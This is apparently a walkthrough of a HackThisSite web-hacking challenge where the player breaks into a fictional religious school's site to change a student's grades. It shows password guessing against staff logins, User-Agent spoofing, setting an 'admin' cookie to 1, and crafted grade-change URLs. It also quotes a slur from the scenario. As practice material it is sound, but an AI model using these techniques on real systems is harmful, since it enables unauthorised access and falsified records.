Holy Word High School
You get to do what every hacker has dreamed of, breaking in and changing grades! Help Zach get his grades fixed, and prove you're as "skilled" as he thinks you are.
From: Zach Sanchez
Message: hey man, it's me Zach, I need a favour from you, I'm in big trouble.
if you'll remember, I go to that super uptight religious school. well, two of my teachers are failing me because my lifestyle does not fall in line with their moralistic rules for public behaviour. My gym teacher even called me a 'long-haired hippie faggot'! And if I fail any classes, I won't graduate.
Listen, can you hack into the school's grade database and make it so I'm passing all my classes? I know they have this system set up on their website that allows teachers to submit grades and stuff, and I heard you pulled a few things in the past as well. Their web master was not thinking in terms of computer security when he was designing the website, so it might be easy. Or not. Please check it out here. The username to my account is 'Zach Sanchez' and my password is 'liberty638'. Thanks man!
- Take a tour of the website.
- In the front page, you'll see there's a hidden link in the bottom of the left side bar image.
<td width=150 valign="top">
<img src="side.jpg" width=150 height=414>
<br />
<a href="staff.php">
<img src="nothing.gif" width=150 height=20 border=0>
</a>
</td> - Visit the page, and there's a login form for teachers.
Visit: hxxp://www.hackthissite.org/missions/realistic/10/staff.php
Please enter your login information to continueusername_____________|____________|password_____________|____________|log in - Since 'Staff Listing' page lists all teachers' information including their e-mail, we could fetch some stuff from that page. Don't forget the email account in some school always is the same account of their website or platform.
- I tried every teacher's email account to login the staff.php page. It's annoying. Finally, I found out that Mrs. Samantha Miller use the password as same as her account name.
- After you login, you will see there's a message text for you.
Welcome, Mrs. Samantha Miller! Please remember that access to the staff administration area is restricted to the district-supplied 'holy_teacher' web browser.
- Yes, we need to use 'holy_teacher' web browser to access the page. But, there's also another way to achieve the same goal which we could modify the User-Agent in the HTTP header.
- I use Chrome Developer Tools to override the User-agent.
- Revisit the staff page. It shows up a control panel now. But due to our restricted privilege, we still could not modify anything.
(note: you are not an administrator so you cannot change grades)
- Check the cookies, there's a cookie named 'admin' and it's value is zero. Use the code below to modify it, then refresh the page.
javascript:document.cookie="admin=1";
- Now, you could click the 'Change Grades' button and view Zach Sanchez's grades information. However, the system shows us a text message that we are too late to change grades.
Sorry, it is too late into the school year to change grades now. The grades will be printed and mailed in just a few days.
- View page source code again. You'll find out every row has a HTML form to change it's value, and the submit button is just commented.
<tr><td>
<form action="staff.php?action=changegrades&changeaction=modrec&rec=4&studentid=1" method="post"></form>
Bible study</td><td width="5"> </td>
<td><input type="text" name="grade" value="2" size="4"></td><td width="5"> </td>
<td><input type="text" name="comments" value="Disruptful in class."></td><td width="5"> </td><td>
<center>1</center></td><td width="5"> </td><td>
<!--<input type="submit" value="modify"></form>-->see below</td>
</tr> - The two subjects Zach will be failed is the Bible study and the Gym of semester 2. Use the URL like below to send requests for modifying the grades and comments.
Bible study :
staff.php?action=changegrades&changeaction=modrec&rec=0&studentid=1&grade=5&comments=Does%20well
Gym :
staff.php?action=changegrades&changeaction=modrec&rec=3&studentid=1&grade=5&comments=Does%20well - Good Job, OOXXOOXX, You have sucessfully completed Mission 10